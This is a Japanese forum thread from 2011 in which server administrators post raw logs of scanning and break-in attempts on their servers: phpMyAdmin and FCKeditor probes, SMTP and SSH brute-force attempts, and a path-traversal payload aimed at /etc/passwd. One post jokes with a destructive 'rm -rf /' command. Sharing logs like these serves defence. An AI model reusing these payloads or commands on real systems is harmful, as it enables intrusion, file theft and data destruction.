89.149.242.190 [22/Feb/2011:02:52:58 +0900] "GET /phpadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:04 +0900] "GET /phpmanager/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:10 +0900] "GET /phpmy-admin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:16 +0900] "GET /phpmya/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:22 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:28 +0900] "GET /phpmyadmin1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:34 +0900] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:40 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:46 +0900] "GET /pma2005/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:52 +0900] "GET /roundcube/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:58 +0900] "GET /scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:04 +0900] "GET /sl2/data/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:10 +0900] "GET /sqladmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:16 +0900] "GET /sqlmanager/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:22 +0900] "GET /sqlweb/scripts/setup.php HTTP/1.1" 404 REF:-
36DNS未登録さん:2011/02/22(火) 21:59:23.54 ID:???
89.149.242.190 [22/Feb/2011:02:54:28 +0900] "GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:34 +0900] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:40 +0900] "GET /web/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:46 +0900] "GET /webadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:50 +0900] "GET /webdb/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:50 +0900] "GET /websql/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:56 +0900] "GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:02 +0900] "GET /~/PMA/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:08 +0900] "GET /~/admin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:14 +0900] "GET /~/myadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:20 +0900] "GET /~/phpadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:26 +0900] "GET /~/phpmanager/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:32 +0900] "GET /~/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:38 +0900] "GET :2086/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1" 400 REF:-
89.149.242.190 [22/Feb/2011:02:55:44 +0900] "GET :2087/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1" 400 REF:-
89.149.242.190 [22/Feb/2011:02:55:50 +0900] "GET :81/phpmyadmin/scripts/setup.php HTTP/1.1" 400 REF:-

アタックなんて映画の中だけの話だと思ってました
37DNS未登録さん:2011/02/22(火) 22:05:32.86 ID:???
ついでにユーザエージェント
UA:ZmEu
38DNS未登録さん:2011/02/22(火) 23:08:38.12 ID:???
phpmyadminが大好きなんだろうな

i125-202-167-50.s10.a029.ap.plala.or.jp
39DNS未登録さん:2011/02/24(木) 21:58:15.25 ID:???
89.106.13.209 - - [24/Feb/2011:03:08:57 +0900] "GET //phpmyadmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:08:57 +0900] "GET //phpMyAdmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:08:58 +0900] "GET //admin/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:08:59 +0900] "GET //dbadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:08:59 +0900] "GET //myadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:00 +0900] "GET //mysql/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:01 +0900] "GET //mysqladmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:01 +0900] "GET //phpadmin/ HTTP/1.1" 403 211 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:02 +0900] "GET //pma/ HTTP/1.1" 403 206 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:03 +0900] "GET //phpdb/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:03 +0900] "GET //db/ HTTP/1.1" 403 205 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:04 +0900] "GET //mysqladmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:05 +0900] "GET //SQL/ HTTP/1.1" 403 206 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:05 +0900] "GET //padmin/ HTTP/1.1" 403 209 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:06 +0900] "GET //pmadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
89.106.13.209 - - [24/Feb/2011:03:09:07 +0900] "GET //webdb/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
既出かな?
40DNS未登録さん:2011/02/24(木) 22:11:25.93 ID:???
既出っていうか、もう手当たり次第って感じだな
でも、うちには何週間か来てない
41DNS未登録さん:2011/02/25(金) 00:34:28.24 ID:???
pma関係は来るときはドカッとくる
42DNS未登録さん:2011/02/26(土) 04:05:39.00 ID:???
::1 - - [25/Feb/2011:04:07:33 +0900] "OPTIONS * HTTP/1.0" 200 - "-" "Apache (internal dummy connection)"
手前は節穴か
43DNS未登録さん:2011/02/26(土) 04:09:43.91 ID:???
77.222.43.19 - - [25/Feb/2011:22:57:37 +0900] "GET //phpmyadmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:38 +0900] "GET //phpMyAdmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:38 +0900] "GET //MyAdmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:41 +0900] "GET //myadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:44 +0900] "GET //pma/ HTTP/1.1" 403 206 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:45 +0900] "GET //mysql/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
mod_geoipで弾いてるから実害無いが また来てやがる
44DNS未登録さん:2011/02/26(土) 05:51:42.63 ID:???
//っていうのがうざいよね。
馬鹿なのって思うわ。
45DNS未登録さん:2011/02/26(土) 13:30:12.86 ID:???
いや、馬鹿なんでしょ。
46DNS未登録さん:2011/02/27(日) 16:08:26.13 ID:???
195.7.10.56 [26/Feb/2011:13:38:52 +0900] GET //phpMyAdmin/scripts/setup.php HTTP/1.1 404 226
195.7.10.56 [26/Feb/2011:13:38:52 +0900] GET //phpMyAdmin1/scripts/setup.php HTTP/1.1 404 227
195.7.10.56 [26/Feb/2011:13:38:53 +0900] GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1 404 228
195.7.10.56 [26/Feb/2011:13:38:54 +0900] GET //phpadmin/scripts/setup.php HTTP/1.1 404 224
195.7.10.56 [26/Feb/2011:13:38:55 +0900] GET //phpmyadmin/scripts/setup.php HTTP/1.1 404 226
195.7.10.56 [26/Feb/2011:13:38:55 +0900] GET //phpmyadmin.old/scripts/setup.php HTTP/1.1 404 230
195.7.10.56 [26/Feb/2011:13:38:56 +0900] GET //old.phpmyadmin/scripts/setup.php HTTP/1.1 404 230
195.7.10.56 [26/Feb/2011:13:38:57 +0900] GET //phpmyadmin1/scripts/setup.php HTTP/1.1 404 227
195.7.10.56 [26/Feb/2011:13:38:58 +0900] GET //phpmyadmin-2/scripts/setup.php HTTP/1.1 404 228
195.7.10.56 [26/Feb/2011:13:38:58 +0900] GET //phpmyadmin1/scripts/setup.php HTTP/1.1 404 227
195.7.10.56 [26/Feb/2011:13:38:59 +0900] GET //phpmyadmin2/scripts/setup.php HTTP/1.1 404 227
195.7.10.56 [26/Feb/2011:13:39:00 +0900] GET //pma/scripts/setup.php HTTP/1.1 404 219
とか
46.4.50.141 [27/Feb/2011:03:17:47 +0900] GET //lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 219
46.4.50.141 [27/Feb/2011:03:17:47 +0900] GET //newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 224
46.4.50.141 [27/Feb/2011:03:17:48 +0900] GET //news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 218
46.4.50.141 [27/Feb/2011:03:17:49 +0900] GET //phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 221
46.4.50.141 [27/Feb/2011:03:17:49 +0900] GET //phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 221
46.4.50.141 [27/Feb/2011:03:17:50 +0900] GET //admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 213
46.4.50.141 [27/Feb/2011:03:17:50 +0900] GET //phplist/lsts/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 226
46.4.50.141 [27/Feb/2011:03:17:51 +0900] GET //phplists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 222
46.4.50.141 [27/Feb/2011:03:17:51 +0900] GET //list/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 212
のが
1日1回くらい記録されているかなぁ。

SSHDにもやってくる。
reverse mapping checking getaddrinfo for 122.3.134.131.pldt.net [122.3.134.131]
failed - POSSIBLE BREAK-IN ATTEMPT! : 202 time(s)
reverse mapping checking getaddrinfo for 178-162-164-39.local [178.162.164.39]
failed - POSSIBLE BREAK-IN ATTEMPT! : 55 time(s)
Address 64.235.57.228 maps to lasvegas-nv-datacenter.com, but this does not map
back to the address - POSSIBLE BREAK-IN ATTEMPT! : 1 time(s)
47DNS未登録さん:2011/02/28(月) 22:14:22.15 ID:???
>>46
これうちにも来てる
48DNS未登録さん:2011/03/05(土) 15:39:34.86 ID:???
# ping localhost
# rm -rf /
49DNS未登録さん:2011/03/10(木) 22:18:38.98 ID:???
メールサーバへの攻撃 113.244.196.159
1日1万通以上はじいてるのに懲りないww
50DNS未登録さん:2011/03/20(日) 00:41:50.31 ID:???
193.252.15.94
lputeaux-151-43-28-94.w193-252.abo.wanadoo.fr

89.2.94.115
ip-115.net-89-2-94.rev.numericable.fr
51162.78.3.110.ap.yournet.ne.jp:2011/03/20(日) 17:21:36.83 ID:Pnurn98q
162.78.3.110.ap.yournet.ne.jpなんやて
52DNS未登録さん:2011/03/21(月) 00:15:55.40 ID:???
74.3.202.84 - - [20/Mar/2011:08:01:18 +0900] "HEAD /phpmyadmintting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //phpMyAdmin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //admin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //mysql/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //phpmyadmin2/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:20 +0900] "HEAD /epgrec/envSetting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
PMANと結婚しろ
53DNS未登録さん:2011/04/05(火) 07:11:23.24 ID:???
昨夜21時過ぎからSMTP鯖へ2~3秒毎に延々アタック

> "2011-04-04 21:15:49","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:15:51","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:15:53","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:15:55","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:15:57","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:00","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:02","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:04","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:06","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:08","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:10","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:12","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:14","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:16","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:18","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
以下略
54DNS未登録さん:2011/04/11(月) 11:18:44.32 ID:???
なんか見慣れないものがあった

> 2011/04/10,07:49:13,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/","","1.1",200,8097
> 2011/04/10,07:49:17,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:17,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:17,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
55DNS未登録さん:2011/04/11(月) 11:19:48.80 ID:???
> 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
56DNS未登録さん:2011/04/11(月) 11:21:00.04 ID:???
> 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
57DNS未登録さん:2011/04/14(木) 08:14:18.70 ID:???
49.212.19.24
www1230ub.sakura.ne.jp

49.212.21.126
www1102ud.sakura.ne.jp
58DNS未登録さん:2011/05/03(火) 08:53:30.11 ID:qckZg2K9
41.89.28.4 - - [30/Apr/2011:14:35:13 +0900] "GET /webdav/test HTTP/1.1" 404 289 "-" "-"
217.243.187.36 - - [30/Apr/2011:23:45:49 +0900] "GET /webdav/test HTTP/1.1" 404 289 "-" "-"
81.201.60.163 - - [02/May/2011:05:29:09 +0900] "GET /sd/1M HTTP/1.1" 404 280 "-" "-"
195.246.217.24 - - [03/May/2011:07:51:26 +0900] "GET /user/soapCaller.bs HTTP/1.1" 404 296 "-" "Morfeus Fucking Scanner"
59DNS未登録さん:2011/05/04(水) 17:04:25.73 ID:qh2JvQDF
123.30.109.21 - - [04/May/2011:17:00:57 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:00:57 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:00:58 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:01:06 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:01:07 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:01:07 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:02:07 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:02:07 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu"
123.30.109.21 - - [04/May/2011:17:02:07 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "ZmEu"
60DNS未登録さん:2011/05/04(水) 17:20:17.91 ID:???
46.28.109.24 [2011.4/03-12:12:23 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:23 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:29 +0900] "GET //dbadmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:24 +0900] "GET //admin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:35 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:41 +0900] "GET //mysql/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:47 +0900] "GET //mysqladmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:53 +0900] "GET //phpadmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:12:59 +0900] "GET //pma/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:05 +0900] "GET //phpdb/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:11 +0900] "GET //db/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:17 +0900] "GET //mysqladmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:23 +0900] "GET //SQL/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:29 +0900] "GET //padmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:35 +0900] "GET //pmadmin/ HTTP/1.1" 404 REF:-
46.28.109.24 [2011.4/03-12:13:41 +0900] "GET //webdb/ HTTP/1.1" 404 REF:-
61DNS未登録さん:2011/05/04(水) 17:24:36.71 ID:???
113.140.75.222 [2011.4/03-19:45:58 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:-
